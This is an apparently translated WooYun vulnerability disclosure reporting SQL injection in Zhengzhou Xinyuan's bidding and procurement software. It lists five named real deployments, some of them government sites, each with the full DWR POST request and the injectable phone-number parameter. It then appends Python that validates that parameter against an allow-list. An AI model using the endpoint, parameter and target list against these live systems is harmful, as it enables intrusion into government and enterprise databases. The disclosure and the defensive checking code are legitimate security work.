
SQL injection in a widely deployed system, affecting government, banks, enterprises and universities

2015-04-07 10:50

Zhengzhou Xinyuan Information Technology Co., Ltd. is a high-tech and software enterprise specialising in industry application software development, systems integration, and the development and production of information security products. The company holds CMMI Level 3 and ISO 9001 quality management system certifications and is a key enterprise of the National Torch Program software industry base. Its headquarters are in the Zhengzhou High-tech Development Zone on a site of more than 30 mu, where a software and information security product R&D and production base of over 30,000 square metres is planned; its subsidiary, Beijing Xinyuan Shitong Information Technology Co., Ltd., is located in the Zhongguancun Science Park, Haidian District, Beijing.



Customers of this company: http://caigou.xinyuan.com.cn/xmal/index.jhtml

Proof of vulnerability:

1#:http://www.shenhuabidding.com.cn/ibs2_gys/eps/zj/zjgl/zjzc/ZjzcMainFrame.html

Code:
POST /ibs2_gys/dwr/plainjs/ZjzcFacade.Mobile.dwr HTTP/1.1
Host: www.shenhuabidding.com.cn
Connection: keep-alive
Content-Length: 274
Origin: http://www.shenhuabidding.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: text/plain
Accept: */*
Referer: http://www.shenhuabidding.com.cn/ibs2_gys/eps/zj/zjgl/zjzc/PszjzcGsgk.html?dlh=null&autoScript=null&spxhID=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=91CE21626E4788033816E4E1F66BAA3F; _xycms=gHWZqZAJTh; CNZZDATA5831188=cnzz_eid%3D796745449-1420552245-http%253A%252F%252Fwww.baidu.com%252F%26ntime%3D1420557686; Hm_lvt_f5127c6793d40d199f68042b8a63e725=1420556542,1420557715; Hm_lpvt_f5127c6793d40d199f68042b8a63e725=1420560451

callCount=1
httpSessionId=79FBC16525D972693D77BFB97E50E5EB
scriptSessionId=19013B60C978CC428287EE889D0D4319
page=/ibs2_gys/eps/zj/zjgl/zjzc/PszjzcGsgk.html
c0-scriptName=ZjzcFacade
c0-methodName=Mobile
c0-id=4199_1420560509929
c0-param0=string:
c0-param1=string:13112345678



[Screenshot: 32.jpg]





2#:http://www.yy-ggzy.com/ggzy/eps/zj/zjgl/zjzc/ZjzcMainFrame.html

Code:
POST /ggzy/dwr/plainjs/ZjzcFacade.Mobile.dwr HTTP/1.1
Host: www.yy-ggzy.com
Proxy-Connection: keep-alive
Content-Length: 269
Origin: http://www.yy-ggzy.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: text/plain
Accept: */*
Referer: http://www.yy-ggzy.com/ggzy/eps/zj/zjgl/zjzc/PszjzcGsgk.html?dlh=null&autoScript=null&spxhID=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=AFEC36027EFE71A7E4E68784DAD8AFE7; clientlanguage=zh_CN; Hm_lvt_f5127c6793d40d199f68042b8a63e725=1420559458; Hm_lpvt_f5127c6793d40d199f68042b8a63e725=1420559525

callCount=1
httpSessionId=79FBC16525D972693D77BFB97E50E5EB
scriptSessionId=19013B60C978CC428287EE889D0D4319
page=/ggzy/eps/zj/zjgl/zjzc/PszjzcGsgk.html
c0-scriptName=ZjzcFacade
c0-methodName=Mobile
c0-id=374_1420561342895
c0-param0=string:
c0-param1=string:13112345678



[Screenshot: 52.jpg]





3#:http://61.163.21.247:8080/ggzy/eps/zj/zjgl/zjzc/ZjzcMainFrame.html

Code:
POST /ggzy/dwr/plainjs/ZjzcFacade.Mobile.dwr HTTP/1.1
Host: 61.163.21.247:8080
Proxy-Connection: keep-alive
Content-Length: 270
Origin: http://61.163.21.247:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: text/plain
Accept: */*
Referer: http://61.163.21.247:8080/ggzy/eps/zj/zjgl/zjzc/PszjzcGsgk.html?dlh=null&autoScript=null&spxhID=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=003e6acc29d9c0022d781f28a95c; Hm_lvt_f5127c6793d40d199f68042b8a63e725=1420559917; Hm_lpvt_f5127c6793d40d199f68042b8a63e725=1420561648

callCount=1
httpSessionId=79FBC16525D972693D77BFB97E50E5EB
scriptSessionId=19013B60C978CC428287EE889D0D4319
page=/ggzy/eps/zj/zjgl/zjzc/PszjzcGsgk.html
c0-scriptName=ZjzcFacade
c0-methodName=Mobile
c0-id=5639_1420561689818
c0-param0=string:
c0-param1=string:13112345678



[Screenshot: 50.jpg]





4#:http://www.purchase.gov.cn:8080/nncg/eps/zj/zjgl/zjzc/ZjzcMainFrame.html

Code:
POST /nncg/dwr/plainjs/ZjzcFacade.Mobile.dwr HTTP/1.1
Host: www.purchase.gov.cn:8080
Proxy-Connection: keep-alive
Content-Length: 270
Origin: http://www.purchase.gov.cn:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: text/plain
Accept: */*
Referer: http://www.purchase.gov.cn:8080/nncg/eps/zj/zjgl/zjzc/PszjzcGsgk.html?dlh=null&autoScript=null&spxhID=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: _xycms=UZiXHivjI4; _gscu_1193392060=20559788hbskoi14; _gscbrs_1193392060=1; CNZZDATA1252992558=900826305-1420555107-http%253A%252F%252Fwww.baidu.com%252F%7C1420555107; Hm_lvt_f5127c6793d40d199f68042b8a63e725=1420559832; Hm_lpvt_f5127c6793d40d199f68042b8a63e725=1420561856

callCount=1
httpSessionId=79FBC16525D972693D77BFB97E50E5EB
scriptSessionId=19013B60C978CC428287EE889D0D4319
page=/nncg/eps/zj/zjgl/zjzc/PszjzcGsgk.html
c0-scriptName=ZjzcFacade
c0-methodName=Mobile
c0-id=9890_1420561912000
c0-param0=string:
c0-param1=string:13112345678



[Screenshot: 222.jpg]





5#:http://www.tyggzy.com/ggzy/eps/zj/zjgl/zjzc/ZjzcMainFrame.html

Code:
POST /ggzy/dwr/plainjs/ZjzcFacade.Mobile.dwr HTTP/1.1
Host: www.tyggzy.com
Proxy-Connection: keep-alive
Content-Length: 270
Origin: http://www.tyggzy.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: text/plain
Accept: */*
Referer: http://www.tyggzy.com/ggzy/eps/zj/zjgl/zjzc/PszjzcGsgk.html?dlh=null&autoScript=null&spxhID=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=E90E9F09D48FF7FF42FA1390A25565C3; TKPaoPao=true; clientlanguage=zh_CN; Hm_lvt_f5127c6793d40d199f68042b8a63e725=1420558596,1420563171; Hm_lpvt_f5127c6793d40d199f68042b8a63e725=1420563188

callCount=1
httpSessionId=79FBC16525D972693D77BFB97E50E5EB
scriptSessionId=19013B60C978CC428287EE889D0D4319
page=/ggzy/eps/zj/zjgl/zjzc/PszjzcGsgk.html
c0-scriptName=ZjzcFacade
c0-methodName=Mobile
c0-id=3921_1420563254168
c0-param0=string:
c0-param1=string:13112345678



[Screenshot: 01.jpg]





http://zbap.hnicwx.com/hniceps/eps/zj/zjgl/zjzc/ZjzcMainFrame.html

http://zzcg.ccgp.gov.cn/zzcg/wzxx/gyszc/H601808index_1.htm

..........................
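All five proofs above hit the same DWR endpoint, ZjzcFacade.Mobile, and differ only in host, session and call id; the input the report exercises is the phone number carried in c0-param1. The Python below is an added example, not code from the original report or from the vendor. It parses the DWR "plainjs" call body in the form shown above and applies an allow-list check to the Mobile parameter, so a gateway, WAF rule or code reviewer can reject malformed values before they reach the database layer. The function names, the regular expressions and the tampered sample body are this example's own assumptions; the real fix belongs in the server-side facade, which must bind the phone number as a query parameter instead of concatenating it into SQL.

```python
"""Parse DWR plain-text call bodies and allow-list the Mobile parameter.

Added example, not from the original report. Assumes the DWR 'plainjs'
wire format seen in the report: one key=value per line, with call c0's
parameters encoded as c0-paramN=<type>:<value>.
"""
import re
from typing import Dict, List, Tuple
from urllib.parse import unquote

# Constructed sample bodies. LEGIT_BODY mirrors the report's request;
# TAMPERED_BODY carries a stray quote in the phone number (constructed).
LEGIT_BODY = """callCount=1
httpSessionId=79FBC16525D972693D77BFB97E50E5EB
scriptSessionId=19013B60C978CC428287EE889D0D4319
page=/ggzy/eps/zj/zjgl/zjzc/PszjzcGsgk.html
c0-scriptName=ZjzcFacade
c0-methodName=Mobile
c0-id=374_1420561342895
c0-param0=string:
c0-param1=string:13112345678
"""
TAMPERED_BODY = LEGIT_BODY.replace("string:13112345678", "string:13112345678'")

PARAM_RE = re.compile(r"^c(\d+)-param(\d+)$")
# Allow-list for a mainland-China mobile number: exactly 11 digits, leading 1.
MOBILE_RE = re.compile(r"^1[0-9]{10}$")


def parse_dwr_call(body: str) -> Dict[str, object]:
    """Return scriptName, methodName and the ordered (type, value) params of
    call c0. Values are percent-decoded, as the DWR server does before use."""
    fields: Dict[str, str] = {}
    params: Dict[int, Tuple[str, str]] = {}
    for raw in body.splitlines():
        if "=" not in raw:
            continue
        key, _, value = raw.partition("=")
        m = PARAM_RE.match(key)
        if m and m.group(1) == "0":
            typ, _, val = value.partition(":")
            params[int(m.group(2))] = (typ, unquote(val))
        else:
            fields[key] = value
    return {
        "scriptName": fields.get("c0-scriptName", ""),
        "methodName": fields.get("c0-methodName", ""),
        "params": [params[i] for i in sorted(params)],
    }


def is_valid_mobile(value: str) -> bool:
    """True only for a value that matches the mobile-number allow-list."""
    return MOBILE_RE.fullmatch(value) is not None


def check_mobile_call(body: str) -> List[str]:
    """Findings for a ZjzcFacade.Mobile call whose phone parameter fails
    the allow-list; an empty list means the call is acceptable."""
    call = parse_dwr_call(body)
    findings: List[str] = []
    if call["scriptName"] == "ZjzcFacade" and call["methodName"] == "Mobile":
        params = call["params"]
        if len(params) < 2:
            findings.append("Mobile call with fewer than 2 parameters")
        else:
            typ, val = params[1]
            if typ != "string" or not is_valid_mobile(val):
                findings.append(f"rejected Mobile param1: {val!r}")
    return findings


if __name__ == "__main__":
    for name, body in (("legit", LEGIT_BODY), ("tampered", TAMPERED_BODY)):
        print(name, check_mobile_call(body) or "ok")
```

The check decodes the value first and then matches the whole string against a strict pattern; rejecting anything that is not eleven digits removes the quote, comment and keyword characters that an injection depends on without maintaining a deny-list. A validation layer like this reduces exposure across every deployment of the product, but it does not replace parameterised queries in the facade itself.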

Fix:

Source: www.wooyun.org/bugs/wooyun-2015-090409
